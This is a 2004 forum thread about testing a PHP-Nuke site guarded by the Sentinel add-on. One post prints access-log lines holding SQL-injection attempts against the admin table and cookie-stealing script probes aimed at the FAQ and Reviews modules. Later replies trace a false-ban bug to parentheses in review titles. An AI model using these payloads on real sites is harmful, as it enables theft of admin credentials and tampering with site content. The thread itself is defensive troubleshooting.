Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
stephen2417
Worker
Worker



Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Thu Jul 01, 2004 7:21 pm Reply with quote

I had xfsunolesphp (noles for short), test my security on this with sentinel installed on local server and apparently he was able to exploit the Reviews module. Shocked

Now he signed off and went some where so im going to take a look through the logs and see what he did and post back.

Ill get him to post here with the full report when he returns.


Last edited by stephen2417 on Thu Jul 01, 2004 9:31 pm; edited 1 time in total 
View user's profile Send private message Visit poster's website
stephen2417







PostPosted: Thu Jul 01, 2004 7:27 pm Reply with quote

- - [01/Jul/2004:15:00:22 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=
1&categories=-1seelct%20user,%20pwd%20from%20nuke_authors HTTP/1.1" 200 5073
- - [01/Jul/2004:15:00:32 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=
1&categories=-1select%20user,%20pwd%20from%20nuke_authors HTTP/1.1" 200 5072
- - [01/Jul/2004:15:00:40 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
select%20user,%20pwd%20from%20nuke_authors HTTP/1.1" 200 5070
- - [01/Jul/2004:15:01:41 -0400] "GET /home/modules.php?name=Reviews&rop=Yes
&title=f001&text=f002&score=9&email=f00@bar.org&text=f00%253c/textarea%3E%253cscript%3Ealert%2528document.cookie);
%253c/script%3Ebar HTTP/1.1" 302 4981
- - [01/Jul/2004:15:01:43 -0400] "GET /home/index.php HTTP/1.1" 200 5758
- - [01/Jul/2004:15:02:07 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=
1&categories=%253cscript%3Ealert%2528document.cookie);%253c/script%3E HTTP/1.1" 200 5075
- - [01/Jul/2004:15:02:24 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=
1&categories=%25cscript%3Ealert%2528document.cookie);%253c/script%3E HTTP/1.1" 200 5076
- - [01/Jul/2004:15:02:34 -0400] "GET /home/modules.php?name=FAQ&myfaq=yes&id_cat=
1&categories=%3Cscript%3Ealert%2528document.cookie);%253c/script%3E HTTP/1.1" 200 168
- - [01/Jul/2004:15:03:22 -0400] "GET /home/modules.php?name=Reviews&rop=Q&order=
SELECT%20user,%20pwd%20FROM%20nuke_authors HTTP/1.1" 200 4954
- - [01/Jul/2004:15:04:08 -0400] "GET /home/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=
9&email=f00@bar.org&reviewer=f00bar&date=f00bar HTTP/1.1" 200 5195
- - [01/Jul/2004:15:06:05 -0400] "GET /home/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=
[ Only registered users can see links on this board! Get registered or login! ]&reviewer=f00&score=9999 HTTP/1.1" 200 4985
- - [01/Jul/2004:15:06:41 -0400] "GET /home/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=
[ Only registered users can see links on this board! Get registered or login! ]&reviewer=f00&score=9999 HTTP/1.1" 200 4985
- - [01/Jul/2004:15:07:01 -0400] "GET /home/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=
[ Only registered users can see links on this board! Get registered or login! ]&reviewer=f00&score=9999 HTTP/1.1" 200 4984
- - [01/Jul/2004:15:07:44 -0400] "GET /home/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=
999999999999999999999999 HTTP/1.1" 302 38

I have no idea where it started to work, he just kept doing alot of different exploits.

However you can find out by going here... [ Only registered users can see links on this board! Get registered or login! ]
Test the hell outa it, let me know if you need unbanned. Just if you do find a hole dont be to nasty about it, like makin your self an admin and changinag everthing. Plus theres no telling how long that url will stay there since thats running off my computer.
 
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Thu Jul 01, 2004 9:09 pm Reply with quote

What did he exploit? Did he break into your system? Remember that Sentinel does not patch bad code. That's what Chat's service packs are for. Keep the 2 separate when reporting issues.
 
View user's profile Send private message
xfsunolesphp
Regular
Regular



Joined: Aug 23, 2003
Posts: 77

PostPosted: Thu Jul 01, 2004 9:27 pm Reply with quote

it only sent Fake Reviews.
 
View user's profile Send private message
Raven







PostPosted: Thu Jul 01, 2004 9:29 pm Reply with quote

That's a coding issue, not a Sentinel issue. Let Chat know.
 
stephen2417







PostPosted: Thu Jul 01, 2004 9:31 pm Reply with quote

Ya thats what i figured.
 
chatserv
Member Emeritus



Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Thu Jul 01, 2004 10:42 pm Reply with quote

The above examples mention the FAQ module as well, i need to know which ones allowed the attacks to go through in order to patch the vulnerable section, if you do know which ones worked pm me the details and i'll work on fixing it in the morning.
 
View user's profile Send private message Visit poster's website
HauntedWebby
Involved
Involved



Joined: May 19, 2004
Posts: 363
Location: Ogden, UT

PostPosted: Fri Jul 02, 2004 10:08 am Reply with quote

My reviews don't work if you post a comment; sentinel will ban you. If you post an original review your ok.

It's PhpNuke ... not chat or sentential. Bad review code as far as I can tell from 6.9 all the way to 7.3.

_________________
--Webby-- 
View user's profile Send private message Send e-mail
Raven







PostPosted: Fri Jul 02, 2004 10:11 am Reply with quote

Are you using html in your comments? Or will it not work if you post anything, like 'test'?
 
HauntedWebby







PostPosted: Fri Jul 02, 2004 10:16 am Reply with quote

Just write Hi and your banned ... if you post a comment to an existing review. If you write a new one your ok ... even with HTML in it.

I disabled sentinel once to see what was up and I received a phpnuke error that the format or something wasn't allowed. And all I wrote was Hi ... so that's why I know it's a phpnuke problem not anything you all are doing (chat/raven) ... and no version has fixed it Smile
 
damainman
Hangin' Around



Joined: Jul 10, 2004
Posts: 48

PostPosted: Mon Jul 12, 2004 12:23 am Reply with quote

has that been fixed yet webby?
 
View user's profile Send private message
HauntedWebby







PostPosted: Mon Jul 12, 2004 11:31 am Reply with quote

I figured it out .... all by my lonesome (anyone scared yet?) Rolling Eyes

If the title of the original review [that posted just fine] has a ")" or "(" and you post a comment in reply to the original review then you receive an error. The sentenial think the error is a hack so it bans (no it's fault).

I haven't read anywhere that your are not suppose to use special characters in the titles. But so far I've figured that the only thing you can have is alpha numberics and dashes with no problems.
 
Raven







PostPosted: Mon Jul 12, 2004 11:43 am Reply with quote

Actually we have many posts concerning () in titles of downloads. This is a nuke restriction also, so even if Sentinel wasn't stopping it, vanilla nuke would. Thanks for finding out that Reviews suffers the same pains.
 
HauntedWebby







PostPosted: Mon Jul 12, 2004 2:25 pm Reply with quote

Dang there goes my glory ... lol. Laughing Wink

I've been not playing nice with my reviews and since I haven't added special characters mine hasn't failed or banned anything that it shouldn't.

I cut and pasted all the stuff 2417 posted and sentenial caught them all Smile
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©